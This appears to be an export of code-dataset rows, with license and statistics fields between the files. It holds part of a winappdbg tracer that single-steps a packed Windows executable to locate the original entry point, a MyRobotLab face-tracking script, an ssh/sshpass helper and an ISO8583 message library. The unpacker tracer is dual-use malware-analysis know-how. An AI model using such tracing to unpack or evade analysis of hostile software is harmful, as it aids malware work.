self.disasmd.append(e_addr)
# E.2.4 Remember the last two instruction addresses (eip values)
# We need to remember the last two in order to be able to
# disassemble the instruction that jumped to the original
# entry point in the unpacked code
self.lasteip[0] = self.lasteip[1]
self.lasteip[1] = e_addr
# E.2.5 Increment the instruction counter, and check to see if
# we have reached our limit of 250,000 instructions.
# If so, assume that there is no unpacking loop and stop
# tracing (to speed up execution).
self.tracing += 1
if (self.tracing >= 250000):
log("[E] Reached tracing limit of 250000 instructions")
d = exception.debug
pid = exception.get_pid()
d.break_at(pid,e_addr,self.bp_stoptracing)
self.tracing = -1
except Exception as e:
traceback.print_exc()
raise
# E.2.6 bp_stoptracing()
# Set as a breakpoint handler when we want to stop tracing, as we can't
# disable single-step tracing from within the single-step call-back function.
def bp_stoptracing(self,exception):
log("[D] Single-step instruction limit reached -- stopping tracing")
d = exception.debug
tid = exception.get_tid()
pid = exception.get_pid()
d.stop_tracing(tid)
d.dont_break_at(pid,exception.get_exception_address())
### E.3
# exception
#
# winappdbg defined callback function to handle remaining exceptions
###
def exception(self,exception):
log("[*] Unhandled exception at 0x%x: %s" % (exception.get_exception_address(),exception.get_exception_name()))
#log("[-] 0x%x fault at 0x%x" % (exception.get_fault_type(),exception.get_fault_address()))
#
#### end of MyEventHandler class
#
###
# F. Miscellaneous functions
###
### F.1
# log(msg):
###
def log(msg):
global logfile
print(msg)
if not logfile:
logfile = open(sys.argv[1] + ".log","w")
if logfile:
logfile.write(msg + "\n")
logfile.flush()
#logfile.log_text(msg)
### F.2
# simple_debugger(argv):
###
def simple_debugger(filename):
global logfile
try:
handler = MyEventHandler()
#logfile = winappdbg.textio.Logger(filename + ".log",verbose = True)
except:
traceback.print_exc()
with winappdbg.Debug(handler,bKillOnExit = True, bHostileCode = False) as debug:
log("[*] Starting %s" % filename)
debug.execl(filename,bFollow = False)
log("[*] Starting debug loop")
debug.loop()
log("[*] Terminating")
log("[D] Number of created processes: %d" % len(handler.createdprocesses))
for i in range(0,len(handler.eventlog)):
log("%s" % handler.eventlog[i])
###
# G. Start of script execution
###
log("[*] Started at %s" % time.strftime("%Y-%m-%d %H:%M:%S"))
simple_debugger(sys.argv[1])
log("[*] Completed at %s" % time.strftime("%Y-%m-%d %H:%M:%S"))
|
gpl-3.0
| -5,576,724,572,586,196,000
| 29.260176
| 227
| 0.600406
| false
| 3.42945
| false
| false
| false
|
MyRobotLab/pyrobotlab
|
home/CheekyMonkey/tracking-arduino.py
|
1
|
2678
|
# A script to test opencv tracking in MyRobotLab with an Arduino connected to a Raspberry Pi 3
# as at mrl development build version 2489
# a mashup of code taken from Mats:
# https://github.com/MyRobotLab/pyrobotlab/blob/master/home/Mats/Tracking.py
# and also from Grog:
# http://myrobotlab.org/content/tracking-results
#
from org.myrobotlab.opencv import OpenCVFilterPyramidDown
#Define the x and y tracking servo pins
#articulated neck servos
centreneckPin = 1 # vertical motion
mainneckPin = 2 # horizontal motion
xPin = 9; # horizontal motion
yPin = 10; # vertical motion
#set which camera to use. In my case, 0 references the Raspberry Pi camera
cameraIndex = 0
# set the port to which the Arduino is connected
arduinoPort = '/dev/ttyUSB0'
# start a tracker service instance
tracker = Runtime.start("tracker", "Tracking");
tracker.connect(arduinoPort, xPin, yPin, cameraIndex);
x = tracker.getX();
# invert if necessary
# x.setInverted(True);
x.setVelocity(20)
x.setMinMax(60,90)
#x.setInverted(True);
x.setRest(85)
x.rest()
y = tracker.getY();
y.setVelocity(20)
y.setInverted(True);
y.setMinMax(60,75)
y.setRest(70)
y.rest()
#start an Arduino service instance
#arduino = Runtime.start("tracker.controller","Arduino")
#define a tracker PID instance
pid = Runtime.start("tracker.pid","Pid")
#set the x and y PID values
#pid.setPID("x", 20.0, 5.0, 0.1);
#pid.setPID("y", 20.0, 5.0, 0.1);
opencv = Runtime.start("tracker.opencv","OpenCV")
pid.setPID("x", 5.0, 1.0, 0.1);
pid.setPID("y", 5.0, 1.0, 0.1);
#get the tracker opencv service instance
#opencv = Runtime.getService("tracker.opencv")
sleep(2);
#opencv.addFilter("PyramidDown1","PyramidDown")
#opencv.addFilter("Gray1","Gray")
#as at mrl development build 2423 this next piece is required on the Raspberry Pi (3) under javacv1.3
#for opencv to return video frames
#frameGrabberType = "org.bytedeco.javacv.FFmpegFrameGrabber";
#opencv.captureFromResourceFile("/dev/video0");
#opencv.setFrameGrabberType(frameGrabberType);
#opencv.broadcastState();
#sleep(3);
#rest for a bit
#sleep(3);
tracker.y.setInverted(True);
# additional PyramidDown filter for improved framerate on the Pi (~15 fps)
PreFilterPyramidDown = OpenCVFilterPyramidDown("PreFilterPyramidDown")
tracker.preFilters.add(PreFilterPyramidDown)
tracker.opencv.setDisplayFilter("PreFilterPyramidDown")
#start the opencv video frame capture
opencv.capture();
#opencv.addFilter("lkOpticalTrack1","LKOpticalTrack")
#opencv.setDisplayFilter("lkOpticalTrack1")
#sleep(1)
#opencv.invokeFilterMethod("lkOpticalTrack1","samplePoint",160,120)
#start tracking
#1# tracker.startLKTracking()
#2# tracker.findFace()
#3# tracker.faceDetect()
|
apache-2.0
| -6,644,644,271,138,608,000
| 25.514851
| 102
| 0.754668
| false
| 2.85197
| false
| false
| false
|
tomsercu/metarunlog
|
metarunlog/util.py
|
1
|
1967
|
# Metarunlog, experiment management tool.
# Author: Tom Sercu
# Date: 2015-01-23
import datetime
import subprocess
def nowstring(sec=True, ms= False):
tstr = datetime.datetime.now().isoformat()
if not ms:
tstr = tstr.split('.')[0]
if not sec:
tstr = tstr.rsplit(':',1)[0]
return tstr
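# Example output (times are illustrative):
# nowstring() -> '2015-01-23T14:30:59'
# nowstring(sec=False) -> '2015-01-23T14:30'
# nowstring(ms=True) -> '2015-01-23T14:30:59.123456'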
def sshify(cmd, sshHost, sshPass, vfh=None):
cleancmd = ''
if sshHost:
#cmd = 'ssh -t {} "{}"'.format(sshHost, cmd) #works but messes up terminal
#cmd = 'ssh {} "shopt -s huponexit; {}"'.format(sshHost, cmd) # doesnt work to kill job on exit
cmd = 'ssh {} "{}"'.format(sshHost, cmd)
#TODO use paramiko or pexpect see http://stackoverflow.com/questions/4669204/send-ctrl-c-to-remote-processes-started-via-subprocess-popen-and-ssh
if sshPass:
cleancmd = "sshpass -p '{}' {}".format('***', cmd)
cmd = "sshpass -p '{}' {}".format(sshPass, cmd)
# printing
if not cleancmd: cleancmd = cmd
if vfh: vfh.write(cleancmd + '\n')
return cmd
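# Example (hypothetical host and password):
# sshify('ls /data', 'user@host', 'hunter2')
# -> "sshpass -p 'hunter2' ssh user@host \"ls /data\""
# while the version written to vfh masks the password as '***'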
def _decode_list(data):
rv = []
for item in data:
if isinstance(item, unicode):
item = item.encode('utf-8')
elif isinstance(item, list):
item = _decode_list(item)
elif isinstance(item, dict):
item = _decode_dict(item)
rv.append(item)
return rv
def _decode_dict(data):
rv = {}
for key, value in data.iteritems():
if isinstance(key, unicode):
key = key.encode('utf-8')
if isinstance(value, unicode):
value = value.encode('utf-8')
elif isinstance(value, list):
value = _decode_list(value)
elif isinstance(value, dict):
value = _decode_dict(value)
rv[key] = value
return rv
def get_commit():
cline = subprocess.check_output("git log -n1 --oneline", shell=True)
#print "cline: ", cline
cline = cline.split()
return (cline[0], " ".join(cline[1:]))
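# Example (output values are illustrative): with "a1b2c3d Fix resume logic"
# as the latest one-line git log, get_commit() returns
# ('a1b2c3d', 'Fix resume logic')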
|
mit
| -735,737,418,120,828,800
| 30.725806
| 153
| 0.582613
| false
| 3.414931
| false
| false
| false
|
Seedstars/python-iso8583
|
ISO8583/ISO8583.py
|
1
|
56605
|
"""
(C) Copyright 2009 Igor V. Custodio
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
__author__ = 'Igor Vitorio Custodio <igorvc@vulcanno.com.br>'
__version__ = '1.3.1'
__licence__ = 'GPL V3'
from ISOErrors import *
import struct
class ISO8583:
"""Main Class to work with ISO8583 packages.
Used to create, change, send, receive, parse or work with ISO8583 Package version 1993.
It's 100% Python :)
Enjoy it!
Thanks to: Vulcanno IT Solutions <http://www.vulcanno.com.br>
Licence: GPL Version 3
More information: http://code.google.com/p/iso8583py/
Example:
from ISO8583.ISO8583 import ISO8583
from ISO8583.ISOErrors import *
iso = ISO8583()
try:
iso.setMTI('0800')
iso.setBit(2,2)
iso.setBit(4,4)
iso.setBit(12,12)
iso.setBit(21,21)
iso.setBit(17,17)
iso.setBit(49,986)
iso.setBit(99,99)
except ValueToLarge, e:
print ('Value too large :( %s' % e)
except InvalidMTI, i:
print ('This MTI is wrong :( %s' % i)
print ('The Message Type Indication is = %s' %iso.getMTI())
print ('The Bitmap is = %s' %iso.getBitmap())
iso.showIsoBits();
print ('This is the ISO8583 complete package %s' % iso.getRawIso())
print ('This is the ISO8583 complete package to sent over the TCPIP network %s' % iso.getNetworkISO())
"""
# Attributes
# Bitsto be set 00000000 -> _BIT_POSITION_1 ... _BIT_POSITION_8
_BIT_POSITION_1 = 128 # 10 00 00 00
_BIT_POSITION_2 = 64 # 01 00 00 00
_BIT_POSITION_3 = 32 # 00 10 00 00
_BIT_POSITION_4 = 16 # 00 01 00 00
_BIT_POSITION_5 = 8 # 00 00 10 00
_BIT_POSITION_6 = 4 # 00 00 01 00
_BIT_POSITION_7 = 2 # 00 00 00 10
_BIT_POSITION_8 = 1 # 00 00 00 01
# Array to translate bit to position
_TMP = [0, _BIT_POSITION_8, _BIT_POSITION_1, _BIT_POSITION_2, _BIT_POSITION_3, _BIT_POSITION_4, _BIT_POSITION_5,
_BIT_POSITION_6, _BIT_POSITION_7]
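# Worked example of the translation used by setBit() below: bit 10 lives in
# bitmap byte 10/8 = 1 (10 % 8 = 2, so no -1 adjustment) and its mask is
# _TMP[(10 % 8) + 1] = _TMP[3] = _BIT_POSITION_2 = 0x40, i.e. the second
# bit of the second bitmap byte (bits 9-16)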
_BIT_DEFAULT_VALUE = 0
# ISO8583 contants
_BITS_VALUE_TYPE = {}
# Every _BITS_VALUE_TYPE has:
# _BITS_VALUE_TYPE[N] = [X, Y, Z, W, K]
# N = bit number
# X = short str representation of the bit meaning
# Y = long str representation
# Z = type of the bit (B, N, A, AN, ANS, LL, LLL)
# W = max size of the information that bit N can hold
# K = type of values: a, an, n, ansb, b
_BITS_VALUE_TYPE[1] = ['BME', 'Bit Map Extended', 'B', 16, 'b']
_BITS_VALUE_TYPE[2] = ['2', 'Primary account number (PAN)', 'LL', 19, 'n']
_BITS_VALUE_TYPE[3] = ['3', 'Processing code', 'N', 6, 'n']
_BITS_VALUE_TYPE[4] = ['4', 'Amount transaction', 'N', 12, 'n']
_BITS_VALUE_TYPE[5] = ['5', 'Amount reconciliation', 'N', 12, 'n']
_BITS_VALUE_TYPE[6] = ['6', 'Amount cardholder billing', 'N', 12, 'n']
_BITS_VALUE_TYPE[7] = ['7', 'Date and time transmission', 'N', 10, 'n']
_BITS_VALUE_TYPE[8] = ['8', 'Amount cardholder billing fee', 'N', 8, 'n']
_BITS_VALUE_TYPE[9] = ['9', 'Conversion rate reconciliation', 'N', 8, 'n']
_BITS_VALUE_TYPE[10] = ['10', 'Conversion rate cardholder billing', 'N', 8, 'n']
_BITS_VALUE_TYPE[11] = ['11', 'Systems trace audit number', 'N', 6, 'n']
_BITS_VALUE_TYPE[12] = ['12', 'Date and time local transaction', 'N', 6, 'n']
_BITS_VALUE_TYPE[13] = ['13', 'Date effective', 'N', 4, 'n']
_BITS_VALUE_TYPE[14] = ['14', 'Date expiration', 'N', 4, 'n']
_BITS_VALUE_TYPE[15] = ['15', 'Date settlement', 'N', 4, 'n']
_BITS_VALUE_TYPE[16] = ['16', 'Date conversion', 'N', 4, 'n']
_BITS_VALUE_TYPE[17] = ['17', 'Date capture', 'N', 4, 'n']
_BITS_VALUE_TYPE[18] = ['18', 'Message error indicator', 'N', 4, 'n']
_BITS_VALUE_TYPE[19] = ['19', 'Country code acquiring institution', 'N', 3, 'n']
_BITS_VALUE_TYPE[20] = ['20', 'Country code primary account number (PAN)', 'N', 3, 'n']
_BITS_VALUE_TYPE[21] = ['21', 'Transaction life cycle identification data', 'ANS', 3, 'n']
_BITS_VALUE_TYPE[22] = ['22', 'Point of service data code', 'N', 3, 'n']
_BITS_VALUE_TYPE[23] = ['23', 'Card sequence number', 'N', 3, 'n']
_BITS_VALUE_TYPE[24] = ['24', 'Function code', 'N', 3, 'n']
_BITS_VALUE_TYPE[25] = ['25', 'Message reason code', 'N', 2, 'n']
_BITS_VALUE_TYPE[26] = ['26', 'Merchant category code', 'N', 2, 'n']
_BITS_VALUE_TYPE[27] = ['27', 'Point of service capability', 'N', 1, 'n']
_BITS_VALUE_TYPE[28] = ['28', 'Date reconciliation', 'N', 8, 'n']
_BITS_VALUE_TYPE[29] = ['29', 'Reconciliation indicator', 'N', 8, 'n']
_BITS_VALUE_TYPE[30] = ['30', 'Amounts original', 'N', 8, 'n']
_BITS_VALUE_TYPE[31] = ['31', 'Acquirer reference number', 'N', 8, 'n']
_BITS_VALUE_TYPE[32] = ['32', 'Acquiring institution identification code', 'LL', 11, 'n']
_BITS_VALUE_TYPE[33] = ['33', 'Forwarding institution identification code', 'LL', 11, 'n']
_BITS_VALUE_TYPE[34] = ['34', 'Electronic commerce data', 'LL', 28, 'n']
_BITS_VALUE_TYPE[35] = ['35', 'Track 2 data', 'LL', 37, 'n']
_BITS_VALUE_TYPE[36] = ['36', 'Track 3 data', 'LLL', 104, 'n']
_BITS_VALUE_TYPE[37] = ['37', 'Retrieval reference number', 'N', 12, 'an']
_BITS_VALUE_TYPE[38] = ['38', 'Approval code', 'N', 6, 'an']
_BITS_VALUE_TYPE[39] = ['39', 'Action code', 'A', 2, 'an']
_BITS_VALUE_TYPE[40] = ['40', 'Service code', 'N', 3, 'an']
_BITS_VALUE_TYPE[41] = ['41', 'Card acceptor terminal identification', 'N', 8, 'ans']
_BITS_VALUE_TYPE[42] = ['42', 'Card acceptor identification code', 'A', 15, 'ans']
_BITS_VALUE_TYPE[43] = ['43', 'Card acceptor name/location', 'A', 40, 'asn']
_BITS_VALUE_TYPE[44] = ['44', 'Additional response data', 'LL', 25, 'an']
_BITS_VALUE_TYPE[45] = ['45', 'Track 1 data', 'LL', 76, 'an']
_BITS_VALUE_TYPE[46] = ['46', 'Amounts fees', 'LLL', 999, 'an']
_BITS_VALUE_TYPE[47] = ['47', 'Additional data national', 'LLL', 999, 'an']
_BITS_VALUE_TYPE[48] = ['48', 'Additional data private', 'LLL', 999, 'an']
_BITS_VALUE_TYPE[49] = ['49', 'Verification data', 'A', 3, 'a']
_BITS_VALUE_TYPE[50] = ['50', 'Currency code, settlement', 'AN', 3, 'an']
_BITS_VALUE_TYPE[51] = ['51', 'Currency code, cardholder billing', 'A', 3, 'a']
_BITS_VALUE_TYPE[52] = ['52', 'Personal identification number (PIN) data', 'B', 16, 'b']
_BITS_VALUE_TYPE[53] = ['53', 'Security related control information', 'LL', 18, 'n']
_BITS_VALUE_TYPE[54] = ['54', 'Amounts additional', 'LLL', 120, 'an']
_BITS_VALUE_TYPE[55] = ['55', 'Integrated circuit card (ICC) system related data', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[56] = ['56', 'Original data elements', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[57] = ['57', 'Authorisation life cycle code', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[58] = ['58', 'Authorising agent institution identification code', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[59] = ['59', 'Transport data', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[60] = ['60', 'Reserved for national use', 'LL', 7, 'ans']
_BITS_VALUE_TYPE[61] = ['61', 'Reserved for national use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[62] = ['62', 'Reserved for private use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[63] = ['63', 'Reserved for private use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[64] = ['64', 'Message authentication code (MAC) field', 'B', 16, 'b']
_BITS_VALUE_TYPE[65] = ['65', 'Bitmap tertiary', 'B', 16, 'b']
_BITS_VALUE_TYPE[66] = ['66', 'Settlement code', 'N', 1, 'n']
_BITS_VALUE_TYPE[67] = ['67', 'Extended payment data', 'N', 2, 'n']
_BITS_VALUE_TYPE[68] = ['68', 'Receiving institution country code', 'N', 3, 'n']
_BITS_VALUE_TYPE[69] = ['69', 'Settlement institution county code', 'N', 3, 'n']
_BITS_VALUE_TYPE[70] = ['70', 'Network management Information code', 'N', 3, 'n']
_BITS_VALUE_TYPE[71] = ['71', 'Message number', 'N', 4, 'n']
_BITS_VALUE_TYPE[72] = ['72', 'Data record', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[73] = ['73', 'Date action', 'N', 6, 'n']
_BITS_VALUE_TYPE[74] = ['74', 'Credits, number', 'N', 10, 'n']
_BITS_VALUE_TYPE[75] = ['75', 'Credits, reversal number', 'N', 10, 'n']
_BITS_VALUE_TYPE[76] = ['76', 'Debits, number', 'N', 10, 'n']
_BITS_VALUE_TYPE[77] = ['77', 'Debits, reversal number', 'N', 10, 'n']
_BITS_VALUE_TYPE[78] = ['78', 'Transfer number', 'N', 10, 'n']
_BITS_VALUE_TYPE[79] = ['79', 'Transfer, reversal number', 'N', 10, 'n']
_BITS_VALUE_TYPE[80] = ['80', 'Inquiries number', 'N', 10, 'n']
_BITS_VALUE_TYPE[81] = ['81', 'Authorizations, number', 'N', 10, 'n']
_BITS_VALUE_TYPE[82] = ['82', 'Credits, processing fee amount', 'N', 12, 'n']
_BITS_VALUE_TYPE[83] = ['83', 'Credits, transaction fee amount', 'N', 12, 'n']
_BITS_VALUE_TYPE[84] = ['84', 'Debits, processing fee amount', 'N', 12, 'n']
_BITS_VALUE_TYPE[85] = ['85', 'Debits, transaction fee amount', 'N', 12, 'n']
_BITS_VALUE_TYPE[86] = ['86', 'Credits, amount', 'N', 15, 'n']
_BITS_VALUE_TYPE[87] = ['87', 'Credits, reversal amount', 'N', 15, 'n']
_BITS_VALUE_TYPE[88] = ['88', 'Debits, amount', 'N', 15, 'n']
_BITS_VALUE_TYPE[89] = ['89', 'Debits, reversal amount', 'N', 15, 'n']
_BITS_VALUE_TYPE[90] = ['90', 'Original data elements', 'N', 42, 'n']
_BITS_VALUE_TYPE[91] = ['91', 'File update code', 'AN', 1, 'an']
_BITS_VALUE_TYPE[92] = ['92', 'File security code', 'N', 2, 'n']
_BITS_VALUE_TYPE[93] = ['93', 'Response indicator', 'N', 5, 'n']
_BITS_VALUE_TYPE[94] = ['94', 'Service indicator', 'AN', 7, 'an']
_BITS_VALUE_TYPE[95] = ['95', 'Replacement amounts', 'AN', 42, 'an']
_BITS_VALUE_TYPE[96] = ['96', 'Message security code', 'AN', 8, 'an']
_BITS_VALUE_TYPE[97] = ['97', 'Amount, net settlement', 'N', 16, 'n']
_BITS_VALUE_TYPE[98] = ['98', 'Payee', 'ANS', 25, 'ans']
_BITS_VALUE_TYPE[99] = ['99', 'Settlement institution identification code', 'LL', 11, 'n']
_BITS_VALUE_TYPE[100] = ['100', 'Receiving institution identification code', 'LL', 11, 'n']
_BITS_VALUE_TYPE[101] = ['101', 'File name', 'ANS', 17, 'ans']
_BITS_VALUE_TYPE[102] = ['102', 'Account identification 1', 'LL', 28, 'ans']
_BITS_VALUE_TYPE[103] = ['103', 'Account identification 2', 'LL', 28, 'ans']
_BITS_VALUE_TYPE[104] = ['104', 'Transaction description', 'LLL', 100, 'ans']
_BITS_VALUE_TYPE[105] = ['105', 'Reserved for ISO use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[106] = ['106', 'Reserved for ISO use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[107] = ['107', 'Reserved for ISO use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[108] = ['108', 'Reserved for ISO use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[109] = ['109', 'Reserved for ISO use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[110] = ['110', 'Reserved for ISO use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[111] = ['111', 'Reserved for private use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[112] = ['112', 'Reserved for private use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[113] = ['113', 'Reserved for private use', 'LL', 11, 'n']
_BITS_VALUE_TYPE[114] = ['114', 'Reserved for national use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[115] = ['115', 'Reserved for national use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[116] = ['116', 'Reserved for national use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[117] = ['117', 'Reserved for national use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[118] = ['118', 'Reserved for national use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[119] = ['119', 'Reserved for national use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[120] = ['120', 'Reserved for private use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[121] = ['121', 'Reserved for private use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[122] = ['122', 'Reserved for national use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[123] = ['123', 'Reserved for private use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[124] = ['124', 'Info Text', 'LLL', 255, 'ans']
_BITS_VALUE_TYPE[125] = ['125', 'Network management information', 'LL', 50, 'ans']
_BITS_VALUE_TYPE[126] = ['126', 'Issuer trace id', 'LL', 6, 'ans']
_BITS_VALUE_TYPE[127] = ['127', 'Reserved for private use', 'LLL', 999, 'ans']
_BITS_VALUE_TYPE[128] = ['128', 'Message authentication code (MAC) field', 'B', 16, 'b']
################################################################################################
# Default constructor of the ISO8583 Object
def __init__(self, iso="", debug=False):
"""Default Constructor of ISO8583 Package.
It inicialize a "brand new" ISO8583 package
Example: To Enable debug you can use:
pack = ISO8583(debug=True)
@param: iso a String that represents the ASCII of the package. The same that you need to pass to setIsoContent() method.
@param: debug (True or False) default False -> Used to print some debug infos. Only use if want that messages!
"""
# Bitmap internal representation
self.BITMAP = []
# Values
self.BITMAP_VALUES = []
# Bitmap ASCII representantion
self.BITMAP_HEX = ''
# MTI
self.MESSAGE_TYPE_INDICATION = '';
# Debug ?
self.DEBUG = debug
self.__inicializeBitmap()
self.__inicializeBitmapValues()
if iso != "":
self.setIsoContent(iso)
################################################################################################
################################################################################################
# Return bit type
def getBitType(self, bit):
"""Method that return the bit Type
@param: bit -> Bit that will be searched and whose type will be returned
@return: str that represents the type of the bit
"""
return self._BITS_VALUE_TYPE[bit][2]
################################################################################################
################################################################################################
# Return bit limit
def getBitLimit(self, bit):
"""Method that return the bit limit (Max size)
@param: bit -> Bit that will be searched and whose limit will be returned
@return: int that indicate the limit of the bit
"""
return self._BITS_VALUE_TYPE[bit][3]
################################################################################################
################################################################################################
# Return bit value type
def getBitValueType(self, bit):
"""Method that return the bit value type
@param: bit -> Bit that will be searched and whose value type will be returned
@return: str that indicate the valuye type of the bit
"""
return self._BITS_VALUE_TYPE[bit][4]
################################################################################################
################################################################################################
# Return large bit name
def getLargeBitName(self, bit):
"""Method that return the large bit name
@param: bit -> Bit that will be searched and whose name will be returned
@return: str that represents the name of the bit
"""
return self._BITS_VALUE_TYPE[bit][1]
################################################################################################
################################################################################################
# Set the MTI
def setTransationType(self, type):
"""Method that set Transation Type (MTI)
@param: type -> MTI to be setted
@raise: ValueToLarge Exception
"""
type = "%s" % type
if len(type) > 4:
raise ValueToLarge('Error: value too large! MTI limit size = 4')
typeT = "";
if len(type) < 4:
for cont in range(len(type), 4):
typeT += "0"
self.MESSAGE_TYPE_INDICATION = "%s%s" % (typeT, type)
################################################################################################
################################################################################################
# setMTI too
def setMTI(self, type):
"""Method that set Transation Type (MTI)
In fact, is an alias to "setTransationType" method
@param: type -> MTI to be setted
"""
self.setTransationType(type)
################################################################################################
################################################################################################
# Method that put "zeros" inside bitmap
def __inicializeBitmap(self):
"""Method that inicialize/reset a internal bitmap representation
It's a internal method, so don't call!
"""
if self.DEBUG == True:
print('Init bitmap')
if len(self.BITMAP) == 16:
for cont in range(0, 16):
self.BITMAP[cont] = self._BIT_DEFAULT_VALUE
else:
for cont in range(0, 16):
self.BITMAP.append(self._BIT_DEFAULT_VALUE)
################################################################################################
################################################################################################
# init with "0" the array of values
def __inicializeBitmapValues(self):
"""Method that inicialize/reset a internal array used to save bits and values
It's a internal method, so don't call!
"""
if self.DEBUG == True:
print('Init bitmap_values')
if len(self.BITMAP_VALUES) == 129:  # index 0 plus bits 1-128
for cont in range(0, 129):
self.BITMAP_VALUES[cont] = self._BIT_DEFAULT_VALUE
else:
for cont in range(0, 129):
self.BITMAP_VALUES.append(self._BIT_DEFAULT_VALUE)
################################################################################################
################################################################################################
# Set a value to a bit
def setBit(self, bit, value):
"""Method used to set a bit with a value.
It's one of the most important methods to use when using this library
@param: bit -> bit number to be set
@param: value -> the value of the bit
@return: True/False default True -> To be used in the future!
@raise: BitInexistent Exception, ValueToLarge Exception
"""
if self.DEBUG == True:
print('Setting bit inside bitmap bit[%s] = %s' % (bit, value))
if bit < 1 or bit > 128:
raise BitInexistent("Bit number %s dosen't exist!" % bit)
# calculate the position inside the bitmap
pos = 1
if self.getBitType(bit) == 'LL':
self.__setBitTypeLL(bit, value)
if self.getBitType(bit) == 'LLL':
self.__setBitTypeLLL(bit, value)
if self.getBitType(bit) == 'N':
self.__setBitTypeN(bit, value)
if self.getBitType(bit) == 'A':
self.__setBitTypeA(bit, value)
        if self.getBitType(bit) == 'ANS':
            self.__setBitTypeANS(bit, value)
        if self.getBitType(bit) == 'B':
            self.__setBitTypeB(bit, value)
# Continuation bit?
if bit > 64:
self.BITMAP[0] = self.BITMAP[0] | self._TMP[2] # need to set bit 1 of first "bit" in bitmap
        if (bit % 8) == 0:
            pos = (bit // 8) - 1
        else:
            pos = (bit // 8)
# need to check if the value can be there .. AN , N ... etc ... and the size
self.BITMAP[pos] = self.BITMAP[pos] | self._TMP[(bit % 8) + 1]
return True
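    # Illustrative sketch (not from the original code): typical setBit use.
    # Bit 2 is LL by default, so the value gets a 2-digit length prefix;
    # bit 4 is N, so the value is zero-padded to the bit's size limit:
    #   iso = ISO8583()
    #   iso.setBit(2, '4276550000000000')  # stored as '164276550000000000'
    #   iso.setBit(4, '150')               # stored as '000000000150'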
################################################################################################
################################################################################################
# print bitmap
def showBitmap(self):
"""Method that print the bitmap in ASCII form
Hint: Try to use getBitmap method and format your own print :)
"""
self.__buildBitmap()
# printing
print(self.BITMAP_HEX)
################################################################################################
################################################################################################
# Build a bitmap
def __buildBitmap(self):
"""Method that build the bitmap ASCII
It's a internal method, so don't call!
"""
self.BITMAP_HEX = ''
for c in range(0, 16):
if (self.BITMAP[0] & self._BIT_POSITION_1) != self._BIT_POSITION_1:
# Only has the first bitmap
if self.DEBUG == True:
print('%d Bitmap = %d(Decimal) = %s (hexa) ' % (c, self.BITMAP[c], hex(self.BITMAP[c])))
tm = hex(self.BITMAP[c])[2:]
if len(tm) != 2:
tm = '0' + tm
self.BITMAP_HEX += tm
if c == 7:
break
else: # second bitmap
if self.DEBUG == True:
print('%d Bitmap = %d(Decimal) = %s (hexa) ' % (c, self.BITMAP[c], hex(self.BITMAP[c])))
tm = hex(self.BITMAP[c])[2:]
if len(tm) != 2:
tm = '0' + tm
self.BITMAP_HEX += tm
################################################################################################
################################################################################################
# Get a bitmap from str
def __getBitmapFromStr(self, bitmap):
"""Method that receive a bitmap str and transfor it to ISO8583 object readable.
@param: bitmap -> bitmap str to be readable
It's a internal method, so don't call!
"""
# Need to check if the size is correct etc...
cont = 0
if self.BITMAP_HEX != '':
self.BITMAP_HEX = ''
for x in range(0, 32, 2):
if (int(bitmap[0:2], 16) & self._BIT_POSITION_1) != self._BIT_POSITION_1: # Only 1 bitmap
if self.DEBUG == True:
print('Token[%d] %s converted to int is = %s' % (x, bitmap[x:x + 2], int(bitmap[x:x + 2], 16)))
self.BITMAP_HEX += bitmap[x:x + 2]
self.BITMAP[cont] = int(bitmap[x:x + 2], 16)
if x == 14:
break
else: # Second bitmap
if self.DEBUG == True:
print('Token[%d] %s converted to int is = %s' % (x, bitmap[x:x + 2], int(bitmap[x:x + 2], 16)))
self.BITMAP_HEX += bitmap[x:x + 2]
self.BITMAP[cont] = int(bitmap[x:x + 2], 16)
cont += 1
################################################################################################
################################################################################################
# print bit array that is present in the bitmap
def showBitsFromBitmapStr(self, bitmap):
"""Method that receive a bitmap str, process it, and print a array with bits this bitmap string represents.
Usualy is used to debug things.
@param: bitmap -> bitmap str to be analized and translated to "bits"
"""
bits = self.__inicializeBitsFromBitmapStr(bitmap)
print('Bits inside %s = %s' % (bitmap, bits))
################################################################################################
################################################################################################
# inicialize a bitmap using ASCII str
def __inicializeBitsFromBitmapStr(self, bitmap):
"""Method that receive a bitmap str, process it, and prepare ISO8583 object to understand and "see" the bits and values inside the ISO ASCII package.
It's a internal method, so don't call!
@param: bitmap -> bitmap str to be analized and translated to "bits"
"""
bits = []
for c in range(0, 16):
for d in range(1, 9):
if self.DEBUG == True:
print('Value (%d)-> %s & %s = %s' % (
d, self.BITMAP[c], self._TMP[d], (self.BITMAP[c] & self._TMP[d])))
if (self.BITMAP[c] & self._TMP[d]) == self._TMP[d]:
                    if d == 1:  # it is the 8th bit
if self.DEBUG == True:
print('Bit %s is present !!!' % ((c + 1) * 8))
